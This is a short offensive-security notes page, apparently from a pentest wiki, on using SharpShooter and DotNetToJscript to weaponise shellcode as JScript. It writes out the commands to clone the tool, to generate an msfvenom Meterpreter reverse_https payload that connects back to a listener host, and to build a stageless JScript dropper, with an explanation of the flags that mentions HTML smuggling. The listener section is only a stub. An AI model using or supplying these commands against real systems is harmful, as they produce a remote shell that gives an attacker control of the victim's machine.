Jscript

SharpShooter

In recent years, it has become much more common to use DotNetToJscript to weaponize C# compiled assemblies in other file formats (like Jscript, VBScript, and even Microsoft Office macros). A payload generation tool called SharpShooter has been created to assist with this.

Download SharpShooter

sudo git clone https://github.com/mdsecactivebreach/SharpShooter
cd SharpShooter
sudo pip install -r requirements.txt

Generate Shellcode

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f raw -o /var/www/html/shell.txt

Invoke SharpShooter

python SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile /var/www/html/shell.txt --output test

--payload js, will specify a Jscript output format. The next parameter, --dotnetver, sets the .NET framework version to target. The --stageless parameter specifies in-memory execution of the Meterpreter shellcode. The term stageless for SharpShooter refers to whether the entire Jscript payload is transferred at once, or if HTML smuggling is used with a staged Jscript payload. --rawscfile specifies the file containing our shellcode and we set our output file with --output, leaving off the file extension.

Setup A Listener

Manual

Who wants do this manually...

PreviousTechniques NextWord Document

Last updated 11 days ago